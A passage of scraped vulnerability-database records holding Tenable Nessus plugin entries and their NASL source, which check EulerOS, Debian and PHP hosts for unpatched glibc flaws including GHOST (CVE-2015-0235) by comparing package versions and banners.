heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.(CVE-2015-0235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : glibc (EulerOS-SA-2019-1386)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2017-16997", "CVE-2018-11236", "CVE-2018-11237"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:glibc", "p-cpe:/a:huawei:euleros:glibc-all-langpacks", "p-cpe:/a:huawei:euleros:glibc-common", "p-cpe:/a:huawei:euleros:glibc-devel", "p-cpe:/a:huawei:euleros:glibc-headers", "p-cpe:/a:huawei:euleros:libnsl", "p-cpe:/a:huawei:euleros:nscd", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1386.NASL", "href": "https://www.tenable.com/plugins/nessus/124889", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124889);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-0235\",\n \"CVE-2017-16997\",\n \"CVE-2018-11236\",\n \"CVE-2018-11237\"\n );\n script_bugtraq_id(\n 72325\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : glibc (EulerOS-SA-2019-1386)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the glibc packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc\n or libc6) 2.27 and earlier, when processing very long\n pathname arguments to the realpath function, could\n encounter an integer overflow on 32-bit architectures,\n leading to a stack-based buffer overflow and,\n potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An AVX-512-optimized implementation of the mempcpy\n function in the GNU C Library (aka glibc or libc6) 2.27\n and earlier may write data beyond the target buffer,\n leading to a buffer overflow in\n __mempcpy_avx512_no_vzeroupper.(CVE-2018-11237)\n\n - elf/dl-load.c in the GNU C Library (aka glibc or libc6)\n 2.19 through 2.26 mishandles RPATH and RUNPATH\n containing $ORIGIN for a privileged (setuid or\n AT_SECURE) program, which allows local users to gain\n privileges via a Trojan horse library in the current\n working directory, related to the fillin_rpath and\n decompose_rpath functions. This is associated with\n misinterpretion of an empty RPATH/RUNPATH token as the\n './' directory. NOTE: this configuration of\n RPATH/RUNPATH for a privileged program is apparently\n very uncommon most likely, no such program is shipped\n with any common Linux distribution.(CVE-2017-16997)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by\n the gethostbyname() and gethostbyname2() glibc function\n calls. A remote attacker able to make an application\n call either of these functions could use this flaw to\n execute arbitrary code with the permissions of the user\n running the application.(CVE-2015-0235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1386\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b355490c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected glibc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-all-langpacks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libnsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"glibc-2.28-9.h1\",\n \"glibc-all-langpacks-2.28-9.h1\",\n \"glibc-common-2.28-9.h1\",\n \"glibc-devel-2.28-9.h1\",\n \"glibc-headers-2.28-9.h1\",\n \"libnsl-2.28-9.h1\",\n \"nscd-2.28-9.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:31", "description": "Several vulnerabilities have been fixed in eglibc, Debian's version of the GNU C library :\n\n - CVE-2015-0235 Qualys discovered that the gethostbyname and gethostbyname2 functions were subject to a buffer overflow if provided with a crafted IP address argument.\n This could be used by an attacker to execute arbitrary code in processes which called the affected functions.\n\n The original glibc bug was reported by Peter Klotz.\n\n - CVE-2014-7817 Tim Waugh of Red Hat discovered that the WRDE_NOCMD option of the wordexp function did not suppress command execution in all cases. This allows a context-dependent attacker to execute shell commands.\n\n - CVE-2012-6656 CVE-2014-6040 The charset conversion code for certain IBM multi-byte code pages could perform an out-of-bounds array access, causing the process to crash. In some scenarios, this allows a remote attacker to cause a persistent denial of service.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Debian DSA-3142-1 : eglibc - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6656", "CVE-2014-6040", "CVE-2014-7817", "CVE-2015-0235"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eglibc", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3142.NASL", "href": "https://www.tenable.com/plugins/nessus/81029", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3142. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81029);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2015-0235\");\n script_bugtraq_id(69472, 71216, 72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"DSA\", value:\"3142\");\n\n script_name(english:\"Debian DSA-3142-1 : eglibc - security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been fixed in eglibc, Debian's version of\nthe GNU C library :\n\n - CVE-2015-0235\n Qualys discovered that the gethostbyname and\n gethostbyname2 functions were subject to a buffer\n overflow if provided with a crafted IP address argument.\n This could be used by an attacker to execute arbitrary\n code in processes which called the affected functions.\n\n The original glibc bug was reported by Peter Klotz.\n\n - CVE-2014-7817\n Tim Waugh of Red Hat discovered that the WRDE_NOCMD\n option of the wordexp function did not suppress command\n execution in all cases. This allows a context-dependent\n attacker to execute shell commands.\n\n - CVE-2012-6656 CVE-2014-6040\n The charset conversion code for certain IBM multi-byte\n code pages could perform an out-of-bounds array access,\n causing the process to crash. In some scenarios, this\n allows a remote attacker to cause a persistent denial of\n service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-0235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-7817\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-6656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-6040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-0235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2015/dsa-3142\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the eglibc packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 2.13-38+deb7u7.\n\nFor the upcoming stable distribution (jessie) and the unstable\ndistribution (sid), the CVE-2015-0235 issue has been fixed in version\n2.18-1 of the glibc package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"eglibc\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc-bin\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc-dev-bin\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-dev\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-dev-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-i686\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-pic\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-prof\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-amd64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-amd64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-mips64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-mipsn32\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-ppc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-s390\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-s390x\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-sparc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-i686\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-loongson2f\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-mips64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-mipsn32\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-pic\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-ppc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-prof\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-s390\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-s390x\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-sparc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-xen\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1-dev\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1-pic\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1-prof\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"locales\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"locales-all\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"multiarch-support\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"nscd\", reference:\"2.13-38+deb7u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:37", "description": "According to its banner, the version of PHP 5.6.x installed on the remote host is prior to 5.6.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the enchant_broker_request_dict function in ext/enchant/enchant.c could allow a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the phar_rename_archive function in phar_object.c could allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM component due to improper parsing of XML data. A remote attacker can exploit this, via specially crafted XML data, to disclose sensitive information or cause a denial of service. (CVE-2015-8866)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2015-02-25T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-8866"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_6.NASL", "href": "https://www.tenable.com/plugins/nessus/81512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81512);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9705\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-2301\",\n \"CVE-2015-8866\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73031,\n 73034,\n 73037\n );\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"PHP 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.6.x installed on the\nremote host is prior to 5.6.6. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow flaw in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c could allow a remote attacker\n to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library\n (glibc) due to improperly validating user-supplied input\n in the glibc functions __nss_hostname_digits_dots(),\n gethostbyname(), and gethostbyname2(). This allows a\n remote attacker to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function\n php_date_timezone_initialize_from_hash() within the\n 'ext/date/php_date.c' script. An attacker can exploit\n this to access sensitive information or crash\n applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the\n phar_rename_archive function in phar_object.c could\n allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM\n component due to improper parsing of XML data. A remote\n attacker can exploit this, via specially crafted XML\n data, to disclose sensitive information or cause a\n denial of service. (CVE-2015-8866)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68925\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68942\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.[0-5]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.6' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:03", "description": "According to its banner, the version of PHP 5.5.x installed on the remote host is prior to 5.5.22. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the enchant_broker_request_dict function in ext/enchant/enchant.c could allow a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the phar_rename_archive function in phar_object.c could allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM component due to improper parsing of XML data. A remote attacker can exploit this, via specially crafted XML data, to disclose sensitive information or cause a denial of service. (CVE-2015-8866) Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2015-02-25T00:00:00", "type": "nessus", "title": "PHP 5.5.x < 5.5.22 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 